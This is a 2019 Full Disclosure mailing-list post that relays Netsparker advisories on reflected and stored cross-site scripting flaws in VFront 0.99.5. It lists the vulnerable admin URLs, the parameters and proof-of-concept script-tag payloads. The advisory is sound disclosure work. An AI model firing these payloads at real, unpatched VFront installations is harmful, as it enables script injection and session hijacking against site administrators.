[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] Cross-site Scripting Vulnerabilities in VFront 0.99.5
From:       Daniel Bishtawi <daniel () netsparker ! com>
Date:       2019-05-28 8:29:31
Message-ID: CAKD6+R53LBRkLa0L1gm_UF3ftvVhoNk0vr0=fOM=rfhfWTeuHQ () mail ! gmail ! com
[Download RAW message or body]

Hello,

We are informing you about the vulnerabilities we reported in VFront 0.99.5.

Here are the details:

Advisory by Netsparker
Name: Multiple Reflected Cross-site Scripting in VFront 0.99.5
Affected Software: VFront
Affected Versions: 0.99.5
Homepage: http://www.vfront.org/
Vulnerability: Reflected Cross-site Scripting
Severity: High
Status: Fixed
CVE-ID: CVE-2019-9839
CVSS Score (3.0): 7.4 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
Netsparker Advisory Reference: NS-19-002

Technical Details:

URL: http://{domain}/{vfront_path}/admin/menu_registri.php
Parameter Name: descrizione_g
Parameter Type: POST
Attack Pattern: <scRipt>alert(0x00938D)</scRipt>

URL: http://{domain}/{vfront_path}/admin/sync_reg_tab.php?azzera=
Parameter Name: azzera
Parameter Type: GET
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x0067C2)</scRipt>

-------

Advisory by Netsparker
Name: Stored Cross-site Scripting Vulnerability in VFront
Affected Software: VFront
Affected Versions: 0.99.5
Homepage: http://www.vfront.org/
Vulnerability: Stored Cross-site Scripting
Severity: High
Status: Fixed
CVE-ID: CVE-2019-9838
CVSS Score (3.0): 8.6 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Netsparker Advisory Reference: NS-19-003

Technical Details;

Injection Technical Details
URL: http://{domain}/{vfront_path}/admin/sync_reg_tab.php?azzera=
Parameter Name: azzera
Parameter Type: GET
Attack Pattern: '"--&gt;</style></scRipt><scRipt>alert(0x0067C2)</scRipt>

Identification Technical Details
URL: http://{domain}/{vfront_path}/admin/error_log.php

For more information:

   -
   https://www.netsparker.com/web-applications-advisories/ns-19-002-reflected-cross-site-scripting-in-vfront/
   -
   https://www.netsparker.com/web-applications-advisories/ns-19-003-stored-cross-site-scripting-in-vfront/

Regards,

Daniel Bishtawi
Marketing Administrator | Netsparker Web Application Security Scanner
Tel: +44 (0)20 3588 3843
Follow us on Twitter <https://twitter.com/netsparker> | LinkedIn
<https://www.linkedin.com/company/netsparker-ltd> | Facebook
<https://facebook.com/netsparker>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic